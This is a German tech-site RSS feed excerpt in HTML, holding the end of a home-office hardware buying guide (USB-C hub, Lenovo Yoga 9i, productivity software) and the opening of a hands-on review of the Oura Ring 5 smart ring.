<p>Ein integrierter Sensor misst das Raumlicht und passt die Leuchtstärke selbstständig an. Aufgrund der reinen USB-Stromversorgung wird hier kein freier Steckplatz an der Steckdose benötigt – dafür aber am Rechner oder Monitor. Vor dem Kauf sollten Sie die Monitorgröße abgleichen: Bei sehr großen Widescreen-Bildschirmen ab 27 Zoll stößt die 40-cm-Variante nämlich an ihre Grenzen, was die äußere Randausleuchtung angeht. Nutzer von großen Monitoren oder curved-Modellen können auch zu dieser <a href="http://www.amazon.de/dp/B0B87CVVLH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Quantis-Leiste mit 51 cm</a> greifen.</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Anker 555 USB-C Docking Hub (8-in-1)</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6da5a"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Anker-555-USB-C-Docking-Hub-8-in-1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Anker 555 USB-C Docking Hub (8-in-1)" class="wp-image-3153469" width="1200" height="1166" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Anker </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B087QZVQJX?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">Anker 555 USB-C Docking Hub bei Amazon ansehen</a></div>


<p>Preis: 50 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Anschluss Typ:</strong> USB-C (integriertes Anschlusskabel)</li>



<li><strong>Anschlüsse (8-in-1):</strong> 1 × HDMI 2.0, 1 × USB-C (nur Daten), 1 × USB-C (Power Delivery), 2 × USB-A (Daten), 1 × Gigabit-Ethernet, 1 × SD-Kartenleser, 1 × microSD-Kartenleser</li>



<li><strong>Videoausgabe:</strong> Bis zu 4K bei 60 Hz (bei Geräten mit DP 1.4; bei DP 1.2 maximal 4K bei 30 Hz)</li>



<li><strong>Datenübertragungsrate:</strong> Bis zu 10 Gbit/s über die primären USB-C und USB‑A‑Ports (zweiter USB-C-Datenport funkt mit 5 Gbit/s)</li>



<li><strong>Pass-Through-Laden:</strong> Unterstützt USB-C Power Delivery bis 100 Watt Eingang (gibt maximal 85 Watt Ladestrom an das verbundene Notebook weiter)</li>



<li><strong>Gehäuse &amp; Gewicht:</strong> Aluminium-Polycarbonat-Mix für optimierte Wärmeableitung; Gewicht: 128 g</li>



<li><strong>Herstellergarantie:</strong> 18 Monate (inklusive Transporttasche im Lieferumfang)</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B087QZVQJX?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Anker 555 8-in-1 USB-C Hub</a> löst im Homeoffice das Problem fehlender Schnittstellen an modernen, flachen Laptops. Das solide, 128 Gramm schwere Gehäuse aus Aluminium und Polycarbonat sieht dabei nicht nur hochwertig aus. </p>



<p>Es ist spürbar robust und leitet die im Betrieb entstehende Abwärme zuverlässig ab. Im Vergleich zu älteren Hub-Generationen bietet dieses Modell einen wichtigen Vorteil bei der Videoausgabe: Über den HDMI-Port wird eine flüssige Bildwiederholrate von 60 Hertz bei 4K-Auflösung ausgegeben, was die Augen beim Arbeiten an externen Monitoren schont.</p>



<p>Die Anordnung der Ports ist durchdacht, sodass sich zwei herkömmliche USB-A-Stecker für Peripheriegeräte trotz der kompakten Bauweise nicht gegenseitig blockieren. Wer große Datenmengen von Kamera-Speicherkarten übertragen muss, profitiert von den integrierten SD- und microSD-Slots. </p>



<p>Ein weiterer funktionaler Pluspunkt zeigt sich bei der Netzwerkschnittstelle für ein Gigabit-Ethernet-Kabel. Über die Power-Delivery-Funktion schleift der Hub bis zu 85 Watt Ladestrom durch, wodurch etwa ein <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Notebook</a> über dasselbe Kabel geladen werden kann, das auch die Daten überträgt. Wer allerdings ein extrem umfangreiches Set-up mit mehreren externen Bildschirmen oder ausschließlich modernen USB-C-Geräten betreibt, sollte zu einer größeren, stationären Dockingstation greifen. Für den universellen Alltagseinsatz liefert das Anker-Modell aber ein sehr gutes Verhältnis aus Preis und Leistung.</p>



<p><a href="https://www.pcwelt.de/article/1204677/die-besten-usb-c-hubs-im-test.html" target="_blank" rel="noreferrer noopener">Weitere Top-Hubs und Docks mit USB-C-Anschluss testen wir hier</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Premium Homeoffice-Laptop: Lenovo Yoga 9i 2-in-1 Aura Edition</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f6e406"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Lenovo-Yoga-9i-2-in-1-Aura-Edition.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Lenovo Yoga 9i 2-in-1 Aura Edition" class="wp-image-3153472" width="1200" height="678" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Lenovo </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DSGDQWKV?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">Lenovo Yoga 9i bei Amazon ansehen</a></div>


<p>Preis: 2.199 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Display:</strong> 14 Zoll WQUXGA OLED-Touchdisplay, 2-in-1 Convertible (360-Grad-Scharnier für Laptop-, Stand-, Zelt- und Tablet-Modus)</li>



<li><strong>Prozessor:</strong> Intel Core Ultra 7 (mit dedizierter NPU für KI-Anwendungen, Copilot+ PC zertifiziert)</li>



<li><strong>Arbeitsspeicher:</strong> 32 GB RAM</li>



<li><strong>Datenspeicher:</strong> 1 TB NVMe SSD</li>



<li><strong>Grafik:</strong> Integrierte Intel Arc 140V Grafik</li>



<li><strong>Konnektivität:</strong> Wi-Fi 7 (neuester Highspeed-Standard)</li>



<li><strong>Sicherheit:</strong> Infrarot-Kamera (Windows Hello), Fingerabdruckscanner, mechanische Webcam-Abdeckung (Privacy Shutter)</li>



<li><strong>Akku:</strong> 75 Wh Kapazität mit Schnellladefunktion (Rapid Charge)</li>



<li><strong>Gehäuse &amp; Gewicht:</strong> Luna Grau, 15,9 mm flach, Gewicht: 1,32 kg</li>



<li><strong>Zubehör:</strong> Inklusive Lenovo Yoga Pen (Eingabestift mit Druck- und Neigungserkennung)</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home</li>
</ul>



<p>Wer im Homeoffice keine Kompromisse bei Leistung, Mobilität und Displayqualität eingehen möchte, findet im <a href="https://www.amazon.de/dp/B0DSGDQWKV?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Lenovo Yoga 9i Aura Edition</a> ein äußerst starkes Arbeitswerkzeug. Das Gehäuse ist mit knapp 16 Millimetern Dicke und einem Gewicht von 1,32 Kilogramm sehr portabel. Das gestochen scharfe 14-Zoll-OLED-Touchdisplay ist das Herzstück des Gerätes, das Sie mit dem flexiblen 360-Grad-Scharnier schnell zum Tablet umklappen können. </p>



<p>Der mitgelieferte Yoga Pen reagiert präzise auf Druck und Neigung. Damit eignet er sich hervorragend für Skizzen, PDFs oder handschriftliche Notizen.</p>



<p>Unter der Haube arbeitet hier ein moderner Intel Core Ultra 7 Prozessor, der in Kombination mit den üppigen 32 Gigabyte Arbeitsspeicher und der Intel Arc Grafik auch komplexe Aufgaben wie Bildbearbeitung oder Datenanalysen spielend bewältigt. Als offizieller Copilot+ PC bringt das Gerät eine eigene Recheneinheit für <a href="https://www.pcwelt.de/article/2786770/ki-pc-erklaerung-funktionen-npu-copilot.html" target="_blank" rel="noreferrer noopener">lokale KI-Funktionen</a> mit. </p>



<p>Gepaart mit der gesteigerten Energieeffizienz der Prozessorarchitektur liefert der 75-Wh-Akku genügend Ausdauer für einen kompletten Arbeitstag jenseits der Steckdose. Für moderne Sicherheit im mobilen Einsatz sorgen ein Fingerabdrucksensor sowie eine Infrarotkamera zur Gesichtserkennung. Das Premium-Paket hat allerdings seinen Preis – für einfache Office-Tätigkeiten ist das Yoga 9i fast schon überqualifiziert. Power-User kommen hier aber voll auf Ihre Kosten.</p>



<p><a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Günstigere, aber ebenfalls leistungsstarke Laptops testen wir hier.</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Software-Ecke: Drei Must-Have Tools für maximale Produktivität</h2>



<p>Die Hardware steht – dann lohnt sich auch ein Blick auf die Software. Hier finden Sie z. B. <a href="https://www.pcwelt.de/article/2971390/ms-office-alternativen-vergleich-libreoffice-freeoffice-wps-googles.html" target="_blank" rel="noreferrer noopener">die besten Alternativen für Microsoft Office</a>. Doch auch abseits der gängigen Office-Suiten gibt es clevere Programme, die Ihren Arbeitsalltag im Homeoffice spürbar erleichtern:</p>



<ul class="wp-block-list">
<li><strong><a href="https://apps.microsoft.com/detail/xp89dcgq3k6vld?hl=de-DE&amp;gl=DE" target="_blank" rel="noreferrer noopener">Microsoft PowerToys</a> – Das Schweizer Taschenmesser:</strong> Windows 11 bringt zwar von Haus aus gute Funktionen zum Andocken von Fenstern mit, die kostenlose Microsoft-Erweiterung <em>PowerToys</em> hebt das Multitasking aber auf ein neues Level. Mit dem integrierten Tool <em>FancyZones</em> erstellen Sie komplexe, maßgeschneiderte Raster-Layouts auf Ihrem Monitor. Besonders auf großen Bildschirmen zahlt sich das sofort aus: Sie ziehen ein Fenster mit gedrückter Shift-Taste einfach in eine Ihrer definierten Zonen – schon herrscht Ordnung.<br><br></li>



<li><strong>Windows-Nachtmodus – Augenschonendes Arbeiten ohne Zusatzsoftware:</strong> Wenn die Arbeit mal länger dauert, müssen Sie für den Schutz Ihrer Augen kein Extra-Programm installieren. Windows hat ein hervorragendes Bordmittel: den integrierten <em>Nachtmodus</em> (Sie finden ihn in den Systemeinstellungen unter <strong>„Anzeige“</strong>). Einmal aktiviert, reduziert das System den Blaulichtanteil des Monitors automatisch anhand eines festen Zeitplans – oder synchron zum lokalen Sonnenuntergang. Dabei wechselt die Anzeige zu wärmeren, augenschonenden Farben.<br><br></li>



<li><strong><a href="https://krisp.ai/" target="_blank" rel="noreferrer noopener">Krisp</a> – ein starkes Tool für Vieltelefonierer:</strong> Das vielleicht mächtigste Tool für ablenkungsfreie Meetings. Die KI-gestützte Software klinkt sich als virtuelles Mikrofon in Teams, Zoom oder Webex ein und filtert störende Hintergrundgeräusche in Echtzeit heraus. Ob Hundegebell, das Tippen auf einer mechanischen Tastatur oder der <a href="https://www.pcwelt.de/article/1801678/mahroboter-ohne-begrenzungskabel-kaufberatung.html" target="_blank" rel="noreferrer noopener">Rasenmäher</a> des Nachbarn – Krisp sorgt dafür, dass Ihre Stimme glasklar übertragen wird.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Investieren Sie in Ihren täglichen Workflow – es lohnt sich</h2>



<p>Ein effizientes Heimbüro ist ein dynamisches System. Wenn die Eingabegeräte präzise reagieren, die Rechenleistung auch anspruchsvollen Anwendungen standhält und die Beleuchtung Ihre Augen entlastet, entsteht ein reibungsloser Arbeitsfluss. 2026 geht es im Homeoffice nicht mehr um einzelne Geräte, sondern um ihr Zusammenspiel als Gesamtsystem, das produktives und gesundes Arbeiten ermöglicht.</p>



<p>Das bedeutet aber nicht, dass Sie gleich Ihr gesamtes Set-up auf einmal ersetzen müssen. Oft reicht es, gezielt an den größten Reibungspunkten anzusetzen – etwa mit einem neuen Monitor, einem ergonomischen Bürostuhl oder einem leistungsfähigeren PC. Jeder dieser Schritte verbessert das Gesamtsystem spürbar und sorgt dafür, dass Arbeitstage entspannter und effizienter werden.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oura Ring 5 im Test: Ein Durchbruch bei den Smart-Ringen]]></title>
<description><![CDATA[Mike Sawh



Auf einen Blick



Pro




Unglaublich schlank und leicht



Verbesserte Akkulaufzeit



Verarbeitungsqualität und Farbauswahl



Die Begleit-App ist nach wie vor die beste




Kontra




leichte Preiserhöhung



Erfordert ein Abonnement




Fazit



Der Oura Ring 5 ist der elegantes...]]></description>
<link>https://tsecurity.de/de/3677423/it-security-nachrichten/oura-ring-5-im-test-ein-durchbruch-bei-den-smart-ringen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677423/it-security-nachrichten/oura-ring-5-im-test-ein-durchbruch-bei-den-smart-ringen/</guid>
<pubDate>Sat, 18 Jul 2026 06:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.02.png?w=1024" alt="Oura Ring 5" class="wp-image-4197758" width="1024" height="582" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Unglaublich schlank und leicht</li>



<li>Verbesserte Akkulaufzeit</li>



<li>Verarbeitungsqualität und Farbauswahl</li>



<li>Die Begleit-App ist nach wie vor die beste</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>leichte Preiserhöhung</li>



<li>Erfordert ein Abonnement</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Der Oura Ring 5 ist der eleganteste und unauffälligste Smart-Ring, den Sie tragen können, und wird von einer der besten Begleit-Apps der Branche unterstützt. Für diejenigen, die mit dem Aussehen und der Haptik des nach wie vor großartigen Oura Ring 4 zufrieden sind, ist er aber kein unbedingt notwendiges Upgrade.</p>



<p class="wp-block-paragraph">Der Oura Ring 5 ist ein überraschendes Update des besten Smart-Rings auf dem Markt. Alle Gerüchte deuteten auf einen Release gegen Ende 2027 hin, doch Oura überraschte alle, indem das Unternehmen sein neues Modell über ein Jahr früher auf den Markt brachte.</p>



<p class="wp-block-paragraph">Für den Ring 5 ist das Ziel klar: die Hardware des Smart-Rings noch kleiner zu gestalten, ohne dabei Kompromisse bei der Leistung – einschließlich der Akkulaufzeit – einzugehen.</p>



<p class="wp-block-paragraph">Ich bin seit Langem Nutzer des Oura-Rings und habe auch so gut wie alle seine Konkurrenten getestet. Hat der Oura Ring 5 mehr zu bieten als nur ein kleineres Design? Um das herauszufinden, trage ich ihn nun seit fast einem Monat.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>40 Prozent kleineres Design</li>



<li>Mit einer kratzfesteren Beschichtung</li>



<li>In 6 Farben erhältlich</li>
</ul>



<p class="wp-block-paragraph">Die wichtigste Neuigkeit ist, dass der Oura Ring 5 kleiner ist als <a href="https://www.pcwelt.de/article/2618869/oura-ring-4-im-test.html" target="_blank">der Oura Ring 4</a>. Er ist um 40 Prozent kleiner – das ist also nicht nur eine geringfügige Verkleinerung, und der Unterschied ist noch deutlicher, wenn man ihn mit dem klobigen <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">Oura Ring 4 Ceramic Edition</a> vergleicht.</p>



<p class="wp-block-paragraph">Kleiner bedeutet auch leichter: Das Gewicht ist von 3,3–5,2 Gramm (je nach benötigter Größe) auf nur noch 2 Gramm beim leichtesten Ring 5 gesunken. Die Breite hat sich von 7,9 Millimetern auf 6,09 Millimeter verringert, der Ring ist also schon einmal schlanker.</p>



<p class="wp-block-paragraph">Ich habe den Ring 5 neben die Standard- und Keramik-Versionen des Oura Ring 4 sowie eine Reihe anderer Smart-Ringe gelegt. Sie können sofort erkennen, wie sehr der Ring 5 an der Hand weniger auffällt als frühere Modelle und die Konkurrenzprodukte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.11.png?w=1024" alt="Oura Ring 5" class="wp-image-4197759" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Trotz der deutlich geringeren Dicke blieb meine Ringgröße dieselbe wie bei den bisherigen Oura-Modellen. Ich konnte dennoch eine gute Passform erzielen, sodass der Ring nicht zu sehr am Finger hin- und herrutschte.</p>



<p class="wp-block-paragraph">Der Ring besteht nach wie vor aus Titan, sodass Sie ein Produkt erhalten, das leicht und dennoch strapazierfähig ist. Derzeit ist nur ein Titanmodell erhältlich, sodass diejenigen, die auf einen Oura Ring 5 in Keramik hoffen, vorerst leer ausgehen – allerdings könnte ein solches Modell in Zukunft auf den Markt kommen.</p>



<p class="wp-block-paragraph">Oura gibt an, eine härtere PVD-Beschichtung zu verwenden, um die Kratzfestigkeit des Rings zu verbessern. Ich trage ihn nun seit einigen Wochen, und obwohl er nicht gänzlich immun gegen Kratzer ist, weist er noch keine nennenswerten Spuren davon auf. Der Ring 4 aus Keramik ist nach wie vor die beste Wahl, um Kratzer zu vermeiden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.15.png?w=1024" alt="Oura Ring 5" class="wp-image-4197760" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Was Farben und Größen angeht, stehen sechs Farben zur Auswahl. Ich habe die Ausführung in gebürstetem Silber getestet, die einen dezenteren Silber-Look aufweist als der bisherige silberne Oura Ring. Meiner Meinung nach verleiht dies dem Ring ein zurückhaltendes und dennoch sehr elegantes Aussehen.<br></p>



<p class="wp-block-paragraph">Zu den weiteren Farben gehören Schwarz und Silber (die günstigere Option darstellen) sowie Gold, Stealth (mattschwarz) und das brandneue „Deep Rose“, das einen leicht kupferfarbenen Schimmer aufweist. Die Größen reichen von 6 bis 13, was eine Abweichung gegenüber den für den Ring 4 verfügbaren Größen darstellt.</p>



<p class="wp-block-paragraph">Wie bei den Vorgängermodellen können Sie ein kostenloses Größenbestimmungsset bestellen, um sicherzustellen, dass Sie die optimale Passform für die Datenerfassung erhalten.</p>



<p class="wp-block-paragraph">Während Oura für den Ring 4 ein Ladecase eingeführt hat, wird der Ring 5 weiterhin nur mit dem Ladegerät im Dock-Stil ausgeliefert. Das Ladecase ist die zusätzlichen <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">109 Euro</a> durchaus wert, da Sie das Gerät damit bis zu fünf Mal aufladen können, egal wo Sie sich gerade befinden – allerdings muss es sich um das neue Modell und die richtige Größe für Ihren Ring handeln.</p>



<h2 class="wp-block-heading">Fitness &amp; Tracking</h2>



<ul class="wp-block-list">
<li>Erfasst dieselben Messwerte wie der Oura Ring 4</li>



<li>Überarbeitete Sensoren zur Verbesserung der Erfassungsgenauigkeit</li>



<li>Für den vollen Zugriff auf die App ist ein Abonnement erforderlich</li>
</ul>



<p class="wp-block-paragraph">Im Kern haben sich die Hardware des Ring 5 und die Funktionen zur Überwachung Ihrer Messwerte nicht wesentlich verändert. Im Inneren des Rings befinden sich zwei Fotodetektoren, zwei Sätze mit je drei LEDs, ein Temperatursensor sowie ein Beschleunigungsmesser zur Erfassung von Bewegungen und zur Erkennung von Schlafphasen.</p>



<p class="wp-block-paragraph">All dies ermöglicht es dem Ring 5, Daten wie Schritte, Bewegung, Herzfrequenz, Schlaf, Stress sowie die für Oura zentralen Kennzahlen zu Bereitschaft und Belastbarkeit zu messen. Diese Sensoren wurden überarbeitet, um die Genauigkeit im Vergleich zum Ring 4 in einigen Bereichen zu verbessern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.02.png?w=1024" alt="Oura Ring 5" class="wp-image-4197758" width="1024" height="582" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Die Daten werden in der Oura-Begleit-App gespeichert, die nach wie vor als Marktführer unter den Smart-Ringen gilt. Vor allem wenn es darum geht, eine wachsende Menge an Daten und Erkenntnissen auf ansprechende Weise darzustellen.</p>



<p class="wp-block-paragraph">Auf einige Funktionen können Sie kostenlos zugreifen, doch um den Besitz des Geräts lohnenswert zu machen, müssen Sie weiterhin das Monats- oder Jahresabonnement bezahlen.</p>



<p class="wp-block-paragraph">Zudem bietet die App nützliche Integrationen, darunter Strava, Headspace und Clue. Diese helfen dabei, die Lücken bei den Funktionen zu schließen, die der Oura nicht bieten kann – was keine besondere Stärke des Oura-Ökosystems ist.</p>



<p class="wp-block-paragraph">Auf dem Hauptbildschirm „Today“ erhalten Sie Updates zu Ihren täglichen Bereitschaftswerten oder eine Erinnerung daran, wann Sie sich auf das Zubettgehen vorbereiten sollten. Klicken Sie auf das Dropdown-Menü, und es gibt noch viel mehr zu entdecken. Etwa das Protokollieren von Mahlzeiten oder die Nutzung des Symptom-Radars.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.45.png?w=1024" alt="Oura Ring 5" class="wp-image-4197761" width="1024" height="561" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Neue Softwarefunktionen wie „Health Radar“ werden zunächst für Nutzer in den USA eingeführt. Diese Funktion baut auf dem „Symptom Radar“ von Oura auf, um frühe Anzeichen einer Erkrankung zu erkennen. Auch Blutdrucksignale werden in bestimmten Regionen eingeführt. Zwar können Sie mit Ihrem Oura-Ring keinen Blutdruck messen, doch das Gerät verfolgt Trends in Ihren kardiovaskulären Mustern anhand der Daten, die seine optischen Sensoren während der Nacht erfassen.</p>



<p class="wp-block-paragraph">Diese Softwarefunktionen werden sowohl Nutzern des Oura Ring 5 als auch des Oura Ring 4 angeboten, sodass bestehende Besitzer in dieser Hinsicht möglicherweise keinen Anlass für ein Upgrade sehen.</p>



<p class="wp-block-paragraph">Bei der Erfassung der täglichen Schritte leistet der Oura solide Arbeit. Ich habe ihn tagsüber zusammen mit zwei anderen Trackern getragen, und die täglichen Schrittzahlen lagen an den meisten Tagen sehr nahe beieinander.</p>



<p class="wp-block-paragraph">Was die verbesserte Herzfrequenzmessung angeht, sollten Sie eine leichte Verbesserung bei der Trainingsherzfrequenz sowie bei der erholungsbasierten Erfassung während der Schlafüberwachung feststellen.</p>



<p class="wp-block-paragraph">Betrachtet man die Herzfrequenz, so entsprachen die Werte während des Schlafs der zuverlässigen Schlaffrequenzmessung eines Garmin-Geräts und eines weiteren Smart-Rings, den ich parallel dazu trug. Ähnlich verhielt es sich bei den Tagesdurchschnittswerten.</p>



<p class="wp-block-paragraph">Was die Herzfrequenzmessung während des Trainings angeht, <a href="https://www.pcwelt.de/article/3127913/smartwatch-vs-smart-ring-unterschiede-vorteile.html" target="_blank">so war dies schon immer ein Problem für Smart-Ringe im Allgemeinen</a> und nicht nur für Oura. Ganz einfach, weil der Ring dazu neigt, sich zu verschieben, wenn man schwitzt und sich bewegt. Ich würde dennoch sagen, dass die Herzfrequenzmessung während des Trainings keine Stärke von Oura ist.</p>



<p class="wp-block-paragraph">Es wurde jedoch eine Lösung entwickelt, um die Situation zu verbessern. Nun können Sie die Live-Herzfrequenzdaten von einem anderen Wearable teilen. Das bedeutet natürlich, dass Sie ein weiteres Gerät besitzen müssen, aber wenn Sie bereits eines haben, können Sie so an diese besseren Trainingsdaten gelangen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.57.png?w=1024" alt="Oura Ring 5" class="wp-image-4197762" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Dann ist da noch der Schlaf, der seit jeher zu den Stärken von Oura zählt. Das liegt nicht nur daran, dass es ein sehr bequemer Ring ist, den man mit ins Bett nehmen kann – was beim Ring 5 sogar noch mehr der Fall ist.</p>



<p class="wp-block-paragraph">Neben den Schlafwerten erhalten Sie Schlafzusammenfassungen, eine detailliertere Aufschlüsselung des Schlafs sowie Kernkennzahlen wie Schlafphasen und Schlafdauer.</p>



<p class="wp-block-paragraph">Diese Einblicke waren sehr aussagekräftig, insbesondere hinsichtlich der Erfassung des Zeitpunkts, zu dem ich eingeschlafen bin, sowie der angezeigten Zeiten, die ich in der REM-Phase und im Tiefschlaf verbracht habe. Oura zeigt Ihnen zudem, wie gut Sie dabei sind, Ihren Schlafmangel aufzuholen, und inwieweit Sie im Einklang mit Ihrer natürlichen inneren Uhr sind.</p>



<p class="wp-block-paragraph">Viele dieser Kennzahlen bilden die Grundlage für die wichtigsten Erkenntnisse von Oura zu Bereitschaft und Belastbarkeit. Ersteres wurde von anderen Herstellern von Wearables unter ähnlichen oder anderen Namen übernommen.</p>



<p class="wp-block-paragraph">Die „Readiness“-Funktion soll Ihnen ganz einfach anzeigen, ob Sie genug Energie haben, um einen anstrengenden Tag zu bewältigen. Ich habe die „Readiness“-Werte mit ähnlichen Auswertungen von Garmin und Ultrahuman verglichen, und diese lagen nur wenige Punkte von den Oura-Werten ab.</p>



<p class="wp-block-paragraph">Die Erkenntnisse zur Belastbarkeit beziehen sich auf das Verständnis Ihrer Fähigkeit, sich von körperlich anstrengenden oder stressigen Phasen Ihrer Woche zu erholen. Dabei werden Ihre Erholung während der Nacht und des Tages sowie Ihre Stressbelastung im Laufe des Tages berücksichtigt.</p>



<p class="wp-block-paragraph">Sie erfahren dann, ob Sie eine hohe Belastbarkeit gegenüber diesen Faktoren aufweisen oder Schwierigkeiten haben, sich wieder zu erholen.</p>



